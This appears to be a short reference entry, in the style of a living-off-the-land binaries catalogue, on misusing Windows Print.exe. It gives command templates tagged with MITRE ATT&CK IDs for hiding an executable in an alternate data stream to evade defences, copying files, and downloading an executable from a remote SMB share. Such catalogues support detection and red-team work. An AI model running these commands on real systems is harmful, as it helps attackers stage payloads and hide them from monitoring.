Print.exe

Used by Windows to send files to the printer

ADS

Hide binary file in alternate data stream to potentially bypass defensive counter measures

print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe}

Copy file.exe into the Alternate Data Stream (ADS) of file.txt. — MITRE: T1564.004 — Privileges: User

Copy

Copy files

print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_ABSOLUTE:.source.exe}

Copy file from source to destination — MITRE: T1105 — Privileges: User

Copy/Download file from remote server

print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_SMB:.source.exe}

Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. — MITRE: T1105 — Privileges: User